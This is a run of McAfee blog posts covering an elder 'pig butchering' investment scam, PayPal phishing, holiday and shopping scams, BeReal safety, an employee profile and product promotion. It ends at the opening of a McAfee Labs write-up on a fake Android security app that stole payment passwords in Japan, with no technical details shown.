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A Scam in the Family—How a Close Relative Lost $100,000 to an Elder Scam

By McAfee — January 18th 2023 at 00:58

Written by James Schmidt 

Editor’s Note: We often speak of online scams in our blogs, ones that cost victims hundreds if not thousands of dollars. This account puts a face on one of those scams—along with the personal, financial, and emotional pain that they can leave in their wake. This is the story of “Meredith,” whose aunt “Leslie” fell victim to an emerging form on online elder fraud. Our thanks to James for bringing it forward and to “Meredith’s” family for sharing it, all so others can prevent such scams from happening to them. 


“Embarrassing. Simply embarrassing.” She shook her head. “It’s too raw. I can’t talk about it right now. I need time.”   

Her aunt had been scammed. To the tune of $100,000 dollars. My colleague—we both work in the security industry—felt a peculiar sense of loss. 

“I work in this industry. I thought I’d done everything right. I’ve passed on enough warnings to my family and friends to ensure they’d avoid the fate of the scammed.  Simply because I’m in this industry does not imply my circle is always aware of all the threats to them, even if I do my best to teach them.” 

“My mental state, recently, borders on shame; this feeling, you know? How could someone working in my industry have something like this happen to a family member?”  

I told her many people working in other industries cannot control what happens to people in their families even if people in that industry had knowledge that could have helped them or otherwise avoided a problem altogether. 

“I know, but this simply should never have happened! My aunt is one of the smartest, most conscientious people I know, and she fell for this. It’s crazy and I can’t wrap my head around it.” 

My colleague, let’s call her Meredith (not her real name as she’s a bit ashamed to know this happened to a family member), told me the beginnings. 

Let’s call her aunt Leslie. 

Her story unfolds, the overall picture a pastiche of millions of people in the United States today. Her aunt is retired, bored, lonely, and isolated. She feels adrift without something to occupy her time; she was looking for companionship, connections, someone (anyone) to talk to. Her feelings intensified during the pandemic. She morphed into perfect prey for scammers of what is now known as the “Pig Butchering Scam.” 

The term “Pig Butchering” has a visceral and raw feel to it, which falls right in line with how brutal this scam can be. It’s a long con game, where the scammer befriends the victim and encourages them to make small investments through the scammer, which get bigger and bigger over time. The scammer builds trust early with what appear to be small investment wins. None of it is legit. The money goes right into the scammer’s pocket, even as the scammer shows the victim phony financial statements and dashboards to show off the bogus returns. Confidence grows. The scammer wrings even larger sums out of the victim. And then disappears.  

It was a targeted attack that started innocuously enough with a “fake wrong number”. An SMS arrives. A text conversation starts. The scammer then apologizes but tells Leslie someone gave them the number to initiate the text. 

The scammer then uses emotional and psychological techniques to keep Leslie hooked.  “How are you, are you having a nice day?” Leslie, being bored and interested, engages willingly.     

The scammer asks to talk directly, not via text: and a phone conversation ensues.  The scammer proceeds to describe—in very soothing detail—what they are doing, helping people, like Leslie, invest their “hard-earned money” into something that will make them more money, to help them out in retirement. 

Of course, it is too good to be true.  

“The craziest part of all of this is my aunt refuses—to this day—to believe she’s been scammed!” 

She still thinks this scammer is a “friend” even though the entire family is up in arms over this, all of whom beg her aunt to “open her eyes.” 

“My aunt still thinks she’d going to see that money again, or even make some money, which is crazy. The scammers are so good at emotional intelligence; really leveraging heartstrings and psychological makeup of the forlorn in society. My aunt finally agreed to stop sending more money to the scammers, but only after the entire family threatened to cut her off from the rest of the family. It took a lot to get her to stop trusting the scammers.” 

Meredith feels this is doubly sad as the aunt in question is not someone they’d ever imagine would in this predicament. She was always the upright one, always the diligent and hardworking and the best with money. She is smart and savvy and we could never imagine her to be taken by these people and taken so easily. It boggles the mind.” 

She did start to change in the last few years. And the pandemic created a weird situation. Retirement, loneliness from loss of a partner, and the added burden of the pandemic created a perfect storm for her to open herself up to someone willingly, simply for the sake of connection. 

“No one deserves this. It has rocked my family to the core. It is not only about the money, but we’ve found family bonds stretched. She believes these random people, these scammers, more than she believes her own family. Have we been neglectful of our aunt? Does she no longer put her faith in people she knows, rather gives money to complete strangers?” 

Being a security professional does not provide magical protection. We are more aware of scams and scammers, and how they work, and what to look for, and we try to do all we can to keep our family aware of scams out there in the big wide world, but we are human. We fall short. 

Diligence is action. Awareness is action. Education is action. 

We need to be better, all of us, at socializing risky things. We need to consistently educate our family and friends to protect themselves, not only via security software (which everyone should have as default) but by providing tips and tricks and warnings for things we all need to be on the lookout. This is not a one-time thing. The cliché holds true: “If you see something say something.” Repetition helps.  

In today’s world, the need for protecting people’s security, identity, and privacy is critical to keeping them safe. Scammers long stopped focusing on attacking only your computer. Now focus more than ever on YOU: your identity, your privacy, your trust. If they get you there, they soon get your money. 

As for contributing factors to scammers success with their victims, such as loneliness, isolation, and boredom, they all have remedies.  Make connections with your loved ones, especially those easily tagged as vulnerable, those you feel might be at risk. Reach out. It may be hard sometimes due to distance and other factors but make it a point to connect. There is a reason these scammers are succeeding. They are stepping into roles of companions to people who are desperate for connection.   

Most people are greatly saddened at seeing other people being “taken.” Let’s work together to help stop the scammers. 

Look out for each other, and get your people protected! 

Editor’s Closing Note:  

If you or someone you know suspects elder fraud, the following resources can help: 

For further reading on scams and scam prevention, check out the guides in our McAfee Safety Series, which provide in-depth advice on protecting your identity and privacy—and your family from scams. They’re ready to download and share. 

The post A Scam in the Family—How a Close Relative Lost $100,000 to an Elder Scam appeared first on McAfee Blog.

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New Year, New You: Start Fresh With McAfee Protection Score

By McAfee — January 10th 2023 at 14:34

Are you an online oversharer? Do you give your full birthday to all your online shopping accounts? Have a few companies you have accounts with been breached but you didn’t take any action at the time? If you have bad digital habits, now is an excellent time to reset your digital presence. 

In isolation, these small digital transgressions don’t seem like a problem; however, cybercriminals can gather the bits and pieces of information you release into the world and Frankenstein them together to create believable impersonations or entirely new identities. 

To protect your identity, here are a few ways to limit the amount of personally identifiable information (PII) you share online, plus a few tools that can help you identify and close your current security holes. 

Bad Online Habits That Put Your PII at Risk 

Most digital bad habits seem insignificant; however, the more bad habits you have that pile-up, the more at risk your PII and your identity can be. Check out this list of three common habits that you should consider breaking today and why. 

1. Volunteering too much information.

When you sign up for new online shopping accounts, some companies ask for your birthday, your age, your middle name, and primary and secondary phone numbers and email addresses. While it might be nice to receive a special coupon on your birthday, you may want to reconsider volunteering unnecessary private details. To compromise you can sign up with a nickname and leave your birth year blank. That way, if a cybergang ever breaches the company, the criminals won’t get far with your personal details. To steal an identity and ruin someone’s credit, sometimes all it takes it a full name, birthday, and phone number. 

2. Oversharing on social media.

Do you post your every thought and movement on social media? While curating the perfect online profile can be fun, it can also be dangerous to your online safety. For instance, posting “get to know you” quizzes are a gold mine for social engineers and cyber criminals, as the results often reveal potential password inspiration, security question answers, and your likes and dislikes. From here, criminals can take educated guesses at your passwords or tailor a social engineering scheme that’s most likely to fool you. Consider setting your social media profiles to private and blocking followers you don’t know personally. Or, just keep parts of your life a mystery to the wider world. 

3. Reusing passwords.

We can all agree that increasingly strict password requirements are leading to longer and more complex passwords that are confusing to cyber criminals and to the rightful account holders, too! It’s tempting to reuse passwords to reduce the burden on your memory, but this puts your valuable PII in danger. Password and username combinations are often information that’s leaked in company breaches. In what’s called a brute force attack, a cybercriminal can plug that same pairing into hundreds of websites and wait for a hit. Since unique passwords for all your dozens of accounts is imperative, entrust their safekeeping to a password manager.  

Grade Your Online Safety With McAfee Protection Score 

If you’re feeling uneasy about your online habits and the effect they may have had on your online safety, McAfee Protection Score gives you the information you need to take charge and make changes. Protection Score not only tells you how safe (or unsafe) you are, but the tool also offers suggestions on how you can raise your score, and thus be safer online. The service monitors data breaches and indicates when your email was part of a leak. Protection Score also dives into the dark web so you don’t have to. If your government ID or financial information appears, your score will take a large hit. 

Protection Score not only tells you how safe (or unsafe) you are, but the tool also offers suggestions on how you can raise your score, and thus be safer online. The sooner you know your weak points, the quicker and more completely you can fortify your defenses and clean up after months (or years) of bad habits. Knowledge is power in the right against cyber criminals, so Protection Score is an excellent partner to help adopt smarter habits on the path to better online security. 

Get the Whole Package With McAfee+ Ultimate 

With McAfee+ Ultimate, you not only get a Protection Score but a host of other top-rate tools to protect your identity, retain your online privacy, and help you recover from an identity theft. Running an antivirus, connecting to a VPN and installing web protection on your browser are all ways to increase your Protection Score, and these features are available with McAfee’s most thorough privacy, identity, and device protection service. 

Make 2023 the year of living online confidently and safely! 

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How To Recognize An Online Scam

By Alex Merton-McCann — January 4th 2023 at 19:15

It’s been a particularly busy and colourful week, scam-wise in our household. Between 4 family members, we’ve received almost 20 texts or emails that we’ve identified as scams. And the range was vast: from poorly written emails offering ‘must have’ shopping deals to terse text messages reprimanding us for overdue tolls plus the classic ‘Dear mum, I’ve smashed my phone’ and everything in between. 

There’s no doubt that scammers are dedicated opportunists who can pivot fast. They can pose as health authorities during a pandemic, charities after a flood or even your next big love on an online dating platform. And it’s this chameleon ability that means we need to always be on red alert! 

How Big An Issue Are Scams in Australia? 

According to the Australian Competition and Consumer Commission (ACCC), Aussies lost a record amount of more than $2 billion in scams in 2021. And that was with record levels of intervention from the government, law enforcement agencies and the private sector. The most lucrative scams were investment scams ($701 million) followed by payment redirection scams ($227 million) and then romance scams which netted a whopping $142 million. 

But the psychological trauma that is often experienced by victims can be equally as devastating. Many individuals will require extensive counselling and support in order to move on from the emotional scarring from being a victim of hacking. 

So, with scammers putting so much energy into trying to lure us into their web, how can we stay one step ahead of these online schemers and ensure we don’t become a victim? 

What You Can Do To Stay Ahead Of The Scammers 

While there are no guarantees in life, there are a few steps you can take so that you can quickly recognise an online scam. 

1. Slow Down 

If you’ve received a text message, email or call that you think is a scam, don’t respond. Take your time. Slow down and pause. If it’s a call, and you’re not sure – hang up! Or if it’s a text or email – delete it! But if you are concerned that it might be legitimate, call the company directly using the contact information from their official website or through their secure apps.  

2. Think First 

If you are being asked to share your personal information or pay money either via a text or phone call, take some time to think. Does it feel legitimate? Do you have a relationship with this organisation? Remember, scammers are very talented at pretending they are from organisations you know and trust. If in doubt, contact the company directly via their official communication channels. Or ask a trusted friend or family member for their input. But remember, NEVER click on any links in messages from people or organisations you don’t know – no exceptions!! 

3. If Concerned, Act Fast!  

Do not hesitate to take action if something feels wrong. If there are any transactions on your credit card or bank statements that don’t look right, call your bank immediately. If you think you may have given personal information to scammers, then act fast. I recommend calling ID Care – Australia and New Zealand’s national identity and cyber support service. They are a not-for-profit charity that provides support to individuals affected by identity and cyber security issues. 

ReportCyber is another way of notifying authorities of a scam. An initiative of the Australian Government and the Australian Cyber Security Centre, it helps authorities investigate and shut down scams. It’s also a good idea to report the scam to Scamwatch – the dedicated scam arm of the Australian Competition and Consumer Commission (ACCC). 

4. Get Ahead Of The Scammers 

We’ve all heard that ‘prevention is better than a cure’ so taking some time to protect yourself before a scammer comes your way is a no-brainer. Here are my top 5 things to do: 

  • Ensure all your online accounts have an individual complex password. Use a password manager – they’ll create and remember your passwords. 
  • Add multi-factor authentication whenever possible. This could be a code sent to your phone, a token or a secret question. 
  • Ensure you have security software on all your devices 
  • Close any online accounts you don’t use. It will reduce the probability of being caught in a data breach. 
  • Software updates are an important way of protecting your devices (and private info) from security vulnerabilities. So, ensure these are automated.  

Please don’t think smart people don’t get caught up in scams because they do!! Scammers are very adept at looking legitimate and creating a sense of urgency. With many of us living busy lives and not taking the time to think critically, it’s inevitable that some of us will become victims. And remember if you’re offered a deal that just seems too good to be true, then it’s likely a scam! Hang up or press delete!! 

The post How To Recognize An Online Scam appeared first on McAfee Blog.

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Know Your Superpower: Brenda’s McAfee Journey

By Life at McAfee — December 13th 2022 at 17:47

Our How I Got Here series spotlights the stories of McAfee team members who have successfully grown their careers. Read more about Brenda’s McAfee’s journey, what a day in the McAfee sales team is like, and what her superpower is.​​​​​​​

Embracing opportunities

When I started my professional career, I was in technology but one of the few women there at the time. A colleague encouraged me to join the Canadian Information Processing Society as a volunteer. I was just exploring, but it turned out to be a career-builder.

After some time, I joined the Society’s board – my first board appointment ever. Suddenly I was in a leadership position and people were looking to me to make decisions, especially the CIOs and other executives who were on the board with me. I embraced the opportunity, and the expectations they had of me shaped the professional I am today.

A day in the McAfee Sales team

I knew about McAfee from some people who had already worked there and was intrigued by the premise of protecting families online. This was a chance to do what I loved at a bigger scale. And after my interviews, I knew it was the right move!

I am part of the North American Sales team that acquires customers through partnerships with big box retailers throughout North America. Together with our partners, we help customers see the value of McAfee.

In sales, you are constantly interacting with people. Each day is different: one moment I’m planning with partners on how to jointly protect their customers and families online. The next, I’m working will McAfee colleagues on sales strategies and business planning. My days are a steady mix of conference and video calls to collaborate, plan, and connect.

Every day, I get to work with so many great people. On top of that, we’re using our powers for good! Everyone, partners and colleagues alike, are all inspired by our ultimate mission: to protect people and their families. I keep going back to the people – but what a fabulous community of colleagues and partners we work with globally​! I also love the birds-eye view I get across all McAfee’s business units. In order to make good on the promises we make to our partners, I collaborate every day with so many key stakeholders across our entire business.

And now that my children are adults, I’m finding more time for exercise, like Peloton or F45 cross fit. I’m also taking piano classes, and I just wrapped a one-night-a-week downhill skiing program with one of my daughters!

​​​​​​​​​​​​​Flexibility, WISE and meeting global teams

McAfee lets you be flexible in getting your job done and taking on other projects. I am so grateful that I can help others through activities such as WISE (the McAfee Women In Security community). It’s important to do something outside of your day job because it makes your world bigger.

I work with some really great women on the WISE board. We are so supportive of each other. Board work is outside of our normal day jobs and sometimes we want to do things we haven’t done before. We put our heads together to figure it out quickly, divide up the work, and get it done!

I’ve also been very fortunate to be able to meet with many customers, partners, and colleagues face-to-face. This has allowed me to learn and grow, not only in my career but also in the Diversity and Inclusion space. The more you know about someone, the better partner and ally you can be.

​​​​​​​​​​​​​​​My superpower

Over my career, I’ve built up my superpower: building relationships. I choose to be positive and empathetic, which helps me develop strong working relationships. I also keep in touch with people I’ve worked with over the years, whether they are peers, customers, or younger professionals I’ve mentored.

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A PayPal Email Scam Is Making the Rounds: Here’s How to Identify and Avoid It

By McAfee — December 12th 2022 at 18:39

Payment applications make splitting restaurant bills, taxi fares, and household expenses so much easier. Without having to tally totals at the table or fumble with crumpled bills, you and your companions can spend less stress and more time on the fun at hand. 

There are various payment apps available, and the company that may first come to mind is PayPal. PayPal is regarded as a safe platform where security and strong encryption are a priority; however, a recent and advanced phishing scam is putting PayPal users at risk of giving up large sums of money and their personally identifiable information (PII).1 

Let’s look at this “triple-pronged” PayPal phishing scam and review some tips to help you identify and proceed should you encounter it. 

1. The Email

The typical part of this three-sided scam is the phishing email component. According to one source, the phishing email comes from a legitimate-looking PayPal service email address. Luckily, the typos, odd punctuation, extra spaces, and grammar errors in the body of the email give away that it is a phishing attempt. Remember, phishing emails are often worded poorly or have errors. Large companies, especially ones like PayPal, have teams of content experts vetting all automated messages for such mistakes, so several mistakes in an email should set off your alarm bells. Proceed with caution and do not click on any links in the message. 

The email also included wording that encouraged the user to act quickly or be charged a lot of money. That’s another trademark of phishing emails: urgency. Take a deep breath and make sure to reread carefully all emails that “require” a quick response. Don’t be scared by dire consequences. Phishers rely on people to rush and not give themselves time to listen to their better judgement. 

2. The ‘One-ring’ Phone Scam

The PayPal phishing email included a support phone number that claimed it was toll free. In actuality, it was an international phone number. So, if the recipient of the phishing email didn’t quite believe the message but wanted to follow up, the scam could catch them with what’s called a one-ring phone scam.2 This occurs when someone unknowingly calls an international phone number and then gets charged by their phone company for the long-distance call. 

The best way to avoid one-ring phone scams is to never call a number you don’t recognize. Always go to an organization’s official website to find their contact information. 

3. The Fake Fraud Hotline

The third dimension of this PayPal scam was the international phone number in the phishing email connected the caller directly with the scammer who posed as the PayPal fraud department. The “customer service representative” then asked prying personal and financial questions to glean enough PII to break into a PayPal account or compromise the caller’s identity. This is the most damaging part of the scam. An excellent customer support team may be able to reimburse you your lost money; however, once your personal details are in nefarious hands, you can’t take them back. 

In addition to never calling numbers you haven’t verified, never give out passwords and never give out more personal information than you need to. Even in legitimate customer service calls, it’s not rude to ask why the representative requires the information they’re asking for. In a fake call, questions like that may fluster the scammer, so keep an ear tuned to their tone. 

For Peace of Mind, Partner With McAfee

Overall, our best advice for handling suspicious emails is to delete them. If it’s truly important, the sender will contact you again. And if a thief somehow stole money from one of your payment apps, the customer service team should be able to walk you through the steps to recover it. 

The transfer and handling of large sums of money would make anyone nervous. To give you peace of mind, consider partnering with a service that can help you recover should you ever fall for a scheme and compromise your PII. McAfee+ Ultimate helps you live your best life in private, and the service includes credit monitoring with all three credit bureaus, security freeze, and expert online support to help you navigate any scams you encounter. 

Having McAfee+ can protect you from email phishing scams like this. Here are some of the top agencies to report this scam to, if it happens to you: Paypal Fraud Department,  Federal Trade Commision , Cybersecurity & Infrastructure Security Agency IC3 

“Report it. Forward phishing emails to (an address used by the Anti-Phishing Working Group, which includes ISPs, security vendors, financial institutions, and law enforcement agencies). Let the company or person that was impersonated know about the phishing scheme.” – 

1ZDNET, “Watch out for this triple-pronged PayPal phishing and fraud scam.” 

2Federal Communications Commission, “‘One Ring’ Phone Scam.” 

The post A PayPal Email Scam Is Making the Rounds: Here’s How to Identify and Avoid It appeared first on McAfee Blog.

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BeReal – The Newest Kid On The Social Media Block

By Alex Merton-McCann — December 5th 2022 at 10:28

Without doubt, the biggest criticism we all have of social media is that everyone always looks fabulous! And while we all know that everyone is only sharing the best version of themselves, let’s be honest – it can be a little wearing. Well, there’s a new social media platform that is determined to uproot our online curated lives by having users post very real pictures of themselves – with no time to stage or add filters! 

Developed in France in 2020, BeReal is where Aussie teenagers are currently spending their time and energy online. And to be honest, I can totally see why. It’s all about sharing random, authentic pics without having to spend time and energy making them look beautiful. In fact, my 19-year-old tells me that the uglier and weirder the photo, the better! How refreshing!!! 

How Does It Work? 

Once you’ve signed up, the app will send all users a notification at a random time throughout the day that it’s ‘time to BeReal’. As soon as the user opens the app to share a pic, they have just 2 minutes to take a picture of whatever they’re doing at that particular moment whether they’re on the bus, at the gym or chilling at home in trackies. The app will take 2 pictures using the front and back cameras so that your followers can see what you look like and where you are. 

Now, if you don’t manage to post in 2 minutes, you’re officially late and your friends will know. In fact, there’s a small amount of shame for being tardy – as if on some level you’re not committed to being authentic. But don’t let this worry you too much – we can’t wait around all day awaiting the notification to post! 

When you have uploaded your daily snap, your friends can comment, respond to your pic with ‘RealMojis’ and even see where you are in the world with the map feature. Users can also choose to upload their pics to the public feed where other users can leave “RealMoji’ reactions but no comments. But in order to access either the public feed or your friends’ photos, users will need to take their own picture too. 

Now for my favourite parts of this app – this app has NO filters, NO option to ‘like’ anything, NO follower counts and NO private messaging!! How liberating!!  

Is It Safe? 

Like all social media platforms, there are a few risks however with a bit of strategy and a few smarts, users should be able to have a safe and positive experience. And when compared to platforms where follower counts and likes are public, influencers dominate and comments are allowed, BeReal is definitely a great choice.  

Here are my top tips to keep the experience safe and positive: 

1. Disable Your Location To Avoid Being ‘Discoverable’ 

Before you share your pics, ensure you disable your location to avoid the app sharing your exact location on the map. You don’t want an ill-intentioned follower knowing your exact whereabouts! 

2. Think (Quickly) Before You Post 

The very brief 2-minute posting window may result in rushed decisions about what to post and potentially oversharing of personal information. So, ensure you (and your kids) know not to share anything that can identify their location, any identifiable numbers such as passports or licences or, their computer screens that may display confidential information.  

3. Don’t Feel Pressures to Post If You Can’t  

Accept that there will be times when you just can’t post within the 2-minute time frame.  You may be driving, sleeping or doing something far more important. You can absolutely still post late. 

4. Know How To Report Bad Behaviour 

If you see a post that is inappropriate, then report it immediately. It’s an investment in keeping the BeReal community as safe as possible. Simply tap the three dots at the top right of the post. A report button should appear. You will then have the option to flag the post as undesirable or inappropriate. 

5. Be Aware of the Comparison Trap!  

Like all social media platforms, users may compare their posts with others. They may think their lives are boring and predictable, particularly if their friends are doing more exciting things. If a young person is prone to anxiety or low mood, this may not be helpful. As a parent, reminding your kids that perception is not reality, and that one photo does not define a person may be required. But if it all gets too much, a digital detox might be just the thing!  

So, if your kids have embraced BeReal then your homework is pretty easy – join up too! It’s impossible to understand your kids’ online world if you don’t take some time to step inside it. And for what it’s worth – I think you’ll really like this one. The fact that there is no public like count, follower tally, filters or private messaging makes the Mama Bear in me very happy!! 

The post BeReal – The Newest Kid On The Social Media Block appeared first on McAfee Blog.

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‘Tis the Season for Holiday Scams

By McAfee — December 3rd 2022 at 10:15

This time of year, the air not only gets chillier but a bit cheerier for everyone … including online scammers. Holiday scams are a quick way to make a buck, and cybercriminals employ several holiday-themed schemes to weasel money and personally identifiable information (PII) from gift givers. 

Here are three common holiday scams to watch out for this year, plus a few tips to help you stay safe online. 

1. Gift Card Cracking

Gift cards are a standby present for the people on your list who are difficult to buy for or for people you don’t know too well but want to get them a small something. Whether the gift card is worth $5 or $500, an online scammer can steal the entire value through two techniques: a brute force attack or phishing. Known as gift card cracking, cybercriminals can take wild guesses at gift card codes and cash in the value for themselves by methodically guessing strings of numbers and letters and crossing their fingers for a match. Cybercriminals will also employ phishing emails, texts or social media direct messages to trick people into divulging gift card information. 

To avoid gift card cracking, encourage gift receivers to redeem their gift card quickly to shorten the amount of time a scammer has to guess the code correctly. Or, you could opt for a paper gift certificate from a small business that doesn’t require online redeeming at all. To avoid gift card phishing scams, do not engage with any type of correspondence that claims they can double the value of your gift card or claims that there’s a problem with it. Be instantly on alert if anyone asks for the activation code. If the gift card-issuing business really needs to replace your purchase, they’ll issue you a new code. They’ll never ask for your existing one. 

2. Last-minute Shopping Scams

Are you a procrastinator? Watch out for last-minute shopping scams that are targeted at people who leave their gift buying until deep in December. As with anything else, if it’s too good to be true, it probably is. Shopping scams often take the form of phishing emails where criminals impersonate a well-known merchant or shipping company.  

While sales often have a quick timeline, don’t let that short timeline pressure you into making an impulsive decision. Phishers rely on people’s excitement or inattention to trick them into giving up their credit card or banking information. Phishing emails, when you take the time to inspect them, are usually easy to spot. The logos are often blurry, there are often typos and grammar mistakes, and the tone of the message will seem “off.” Either it will sound very formal and impersonalized or it will sound very informal and seem pushy. 

To protect your finances during the holiday season, consider putting a lock on your credit. This is easy to do with McAfee credit lock. You can still use your credit card and shop as you normally would. A credit lock is useful because, in case a criminal gets ahold of your PII, they won’t be able to open lines of credit in your name. This protects your credit score, which is essential to keep in good standing if you hope to buy a house or take out a loan anytime soon. 

3. Social Media Ads and Fake Shopping Sites

Just because a “company” has an ad on Facebook or Instagram doesn’t mean that it’s a legitimate establishment. Before buying from an online store you’ve never heard of, do some background research on it and read customer reviews to make sure that it’s real and will deliver you a quality product.  

Take note of the online store’s URL before entering it. (You can preview the link by hovering over it with your cursor.) If the URL is a string of letters and numbers, it could be a malware site in disguise. One way to alert you to suspicious sites is McAfee Web Protection. Web Protection color codes links to identify potential malware and phishing sites and alert you to steer clear. 

Shop Safely This Holiday Season 

Your mind is already drawn in a bunch of different directions this holiday season (cooking, traveling, shopping, wrapping, tidying) so give yourself a respite from worrying about the safety of your identity and finances. McAfee+ Ultimate includes a VPN, Web Protection, credit lock, antivirus and more to cover all your bases to keep your devices and your PII safe. 

The post ‘Tis the Season for Holiday Scams appeared first on McAfee Blog.

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Unwrapping Some of the Holiday Season’s Biggest Scams

By McAfee — December 1st 2022 at 12:54

Even with the holidays in full swing, scammers won’t let up. In fact, it’s high time for some of their nastiest cons as people travel, donate to charities, and simply try to enjoy their time with friends and family. 

Unfortunate as it is, scammers see this time of year as a tremendous opportunity to profit. While people focus giving to others, they focus on taking, propping up all manner of scams that use the holidays as a disguise. So as people move quickly about their day, perhaps with a touch of holiday stress in the mix, they hope to catch people off their guard with scams that wrap themselves in holiday trappings. 

Yet once you know what to look for, they’re relatively easy to spot. The same scams roll out every year, sometimes changing in appearance yet remaining the same in substance. With a sharp eye, you can steer clear of them. 

Watch out for these online scams this holiday season 

1. Shopping scams 

With Black Friday and Cyber Monday in the books, we can look forward to what’s next—a wave of post-holiday sales events that will likewise draw in millions of online shoppers. And just like those other big shopping days, bad actors will roll out a host of scams aimed at unsuspecting shoppers. Shopping scams take on several forms, which makes this a topic unto itself, one that we cover thoroughly in our Black Friday & Cyber Monday shopping scams blog. It’s worth a read if you haven’t done so already, as digs into the details of these scams and shows how you can avoid them.  

However, the high-level advice for avoiding shopping scams is this: keep your eyes open. Deals that look too good to be true likely are, and shopping with retailers you haven’t heard of before requires a little bit of research to determine if their track record is clean. In the U.S., you can turn to the Better Business Bureau (BBB) for help with a listing of retailers you can search simply by typing in their names. You can also use to look up the web address of the shopping site you want to research. There you can see its history and see when it was registered. A site that was registered only recently may be far less reputable than one that’s been registered for some time. 

2. Tech support scams  

Plenty of new tech makes its way into our homes during the holiday season. And some of that tech can be a little challenging to set up. Be careful when you search for help online. Many scammers will establish phony tech support sites that aim to steal funds and credit card information. Go directly to the product manufacturer for help. Often, manufacturers will offer free support as part of the product warranty, so if you see a site advertising support for a fee, that could be a sign of a scam. 

Likewise, scammers will reach out to you themselves. Whether through links from unsolicited emails, pop-up ads from risky sites, or by spammy phone calls, these scammers will pose as tech support from reputable brands. From there, they’ll falsely inform you that there’s something urgently wrong with your device and that you need to get it fixed right now—for a fee. Ignore these messages and don’t click on any links or attachments. Again, if you have concerns about your device, contact the manufacturer directly. 

3. Travel scams 

With the holidays comes travel, along with all the online booking and ticketing involved. Scammers will do their part to cash in here as well. Travel scams may include bogus emails that pose as reputable travel sites telling you something’s wrong with your booking. Clicking a link takes you to a similarly bogus site that asks for your credit card information to update the booking—which then passes it along to the scammer so they can rack up charges in your name. Other travel scams involve ads for cut-rate lodging, tours, airfare, and the like, all of which are served up on a phony website that only exists to steal credit card numbers and other personal information. 

Some of these scams can look quite genuine, even though they’re not. They’ll use cleverly disguised web addresses that look legitimate, but aren’t, so don’t click any links. If you receive notice about an issue with your holiday travel, contact the company directly to follow up. Also, be wary of ads with unusually deep discounts or that promise availability in an otherwise busy season or time. These could be scams, so stick with reputable booking sites or with the websites maintained by hotels and travel providers themselves. 

4. Fake charity scams 

Donations to an organization or cause that’s close to someone’s heart make for a great holiday gift, just as they offer you a way to give back during the holiday season. And you guessed it, scammers will take advantage of this too. They’ll set up phony charities and apply tactics that pressure you into giving. As with so many scams out there, any time an email, text, direct message, or site urges you into immediate action—take pause. Research the charity. See how long they’ve been in operation, how they put their funds to work, and who truly benefits from them.  

Likewise, note that there some charities pass along more money to their beneficiaries than others. As a general rule of thumb, most reputable organizations only keep 25% or less of their funds for operations, while some less-than-reputable organizations keep up to 95% of funds, leaving only 5% for advancing the cause they advocate. In the U.S., the Federal Trade Commission (FTC) has a site full of resources so that you can make your donation truly count. Resources like Charity Watch and Charity Navigator, along with the BBB’s Wise Giving Alliance can also help you identify the best charities. 

5. Online betting scams 

The holidays also mean a flight of big-time sporting events, and with the advent of online betting in many regions scammers want to cash in. This scam works quite like shopping scams, where bad actors will set up online betting sites that look legitimate. They’ll take your bet, but if you win, they won’t pay out. Per the U.S. Better Business Bureau (BBB), the scam plays out like this: 

“You place a bet, and, at first, everything seems normal. But as soon as you try to cash out your winnings, you find you can’t withdraw a cent. Scammers will make up various excuses. For example, they may claim technical issues or insist on additional identity verification. In other cases, they may require you to deposit even more money before you can withdraw your winnings. Whatever you do, you’ll never be able to get your money off the site. And any personal information you shared is now in the hands of scam artists.” 

You can avoid these sites rather easily. Stick with the online betting sites that are approved by your regional gambling commission. Even so, be sure to read the fine print on any promo offers that these sites advertise because even legitimate betting sites can freeze accounts and the funds associated with them based on their terms and conditions. 

Further protection from scams 

A complete suite of online protection software, such as McAfee+ Ultimate can offer layers of extra security. In addition to more private and secure time online with a VPN, identity monitoring, and password management, it includes web browser protection that can block malicious and suspicious links that could lead you down the road to malware or a phishing scam—which antivirus protection can’t do alone. Additionally, we offer $1M identity theft coverage and support from a recovery pro, just in case. 

And because scammers use personal information such as email addresses and cell phone numbers to wage their attacks, other features like our  Personal Data Cleanup service can scan high-risk data broker sites for your personal information and then help you remove it, which can help reduce spam, phishing attacks, and deny bad actors the information they need to commit identity theft. 

Scammers love a good thing—and will twist it for their own benefit. 

That’s why they enjoy the holidays so much. With all our giving, travel, and charity in play, it’s prime time for their scams. Yet a little insight into their cons, along with some knowledge as to how they play out, you can avoid them.  

Remember that they’re playing into the hustle and bustle of the season and that they’re counting on you to lower your guard more than you might during other times of the year. Keep an eye open for the signs, do a little research when it’s called for, and stick with reputable stores, charities, and online services. With a thoughtful pause and a second look, you can spare yourself the grief of a scam and fully enjoy your holidays. 

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Fake Security App Found Abuses Japanese Payment System

By McAfee Labs — November 30th 2022 at 18:41

Authored by SangRyol Ryu and Yukihiro Okutomi 

McAfee’s Mobile Research team recently analyzed new malware targeting mobile payment users in Japan. The malware which was distributed on the Google Play store pretends to be a legitimate mobile security app, but it is in fact a payment fraud malware stealing passwords and abusing reverse proxy targeting the mobile payment services. McAfee researchers notified Google of the malicious apps, スマホ安心セキュリティ, or ‘Smartphone Anshin Security, package name and com.z.px.appx. The applications are no longer available on Google Play. Google Play Protect has also taken steps to protect users by disabling the apps and providing a warning. McAfee Mobile Security products detect this threat as Android/ProxySpy.  

How do victims install this malware? 

The malware actor continues to publish malicious apps on the Google Play Store with various developer accounts. According to the information posted on Twitter by Yusuke Osumi, Security Researcher at Yahoo! Japan, the attacker sends SMS messages from overseas with a Google Play link to lure users to install the malware. To attract more users, the message entices users to update security software. 

A SMS message from France (from Twitter post by Yusuke)

A SMS message from France (from Twitter post by Yusuke)

malware on Google play

Malware on Google Play 

The Mobile Research team also found that the malware actor uses Google Drive to distribute the malware. In contrast to installing an application after downloading an APK file, Google Drive allows users to install APK files without leaving any footprint and makes the installation process simpler. Once the user clicks the link, there are only a few more touches required to run the application. Only three clicks are enough if users have previously allowed the installation of unknown apps on Google Drive. 

Following notification from McAfee researchers, Google has removed known Google Drive files associated with the malware hashes listed in this blog post. 


What does this malware look like?

When a user installs and launches this malware, it asks for the Service password. Cleverly, the malware shows incorrect password messages to collect the more precise passwords. Of course, it does not matter whether the password is correct or not. It is a way of getting the Service password. The Service password is used for the payment service which provides easy online payments. The user can start this payment service by setting a Service password. The charge will be paid along with the mobile phone bill. 

Interface comparison.
Interface comparison.

How does this malware work?

